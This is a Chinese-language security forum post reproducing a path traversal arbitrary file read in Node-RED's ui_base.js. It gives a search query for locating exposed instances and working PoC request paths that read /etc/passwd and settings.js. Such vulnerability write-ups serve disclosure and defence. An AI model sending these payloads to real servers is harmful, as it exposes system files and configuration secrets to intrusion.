问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Node-RED ui_base 任意文件读取漏洞
# Node-RED ui_base 任意文件读取漏洞 ## 漏洞描述 Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join, 缺乏对最终路径的验证会导致路径遍历漏洞,可...
Node-RED ui\_base 任意文件读取漏洞 ========================== 漏洞描述 ---- Node-RED 在/nodes/ui\_base.js中,URL与'/ui\_base/js/\*'匹配,然后传递给path.join, 缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js 漏洞影响 ---- Node-RED 网络测绘 ---- title="Node-RED" 漏洞复现 ---- 访问页面 ![img](https://shs3.b.qianxin.com/butian_public/f972456b2572604fa20d05d0a337f43539d650d34d2dc.jpg) 验证POC ```plain /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /ui_base/js/..%2f..%2f..%2f..%2fsettings.js ``` ![img](https://shs3.b.qianxin.com/butian_public/f798256e997eabcdfa8969a20f89dbb9a60304955e565.jpg) ![img](https://shs3.b.qianxin.com/butian_public/f519351e6fb2a5a3024e78e0e081988bbf204c70dd2ba.jpg)
发表于 2024-07-12 18:46:31
阅读 ( 981 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!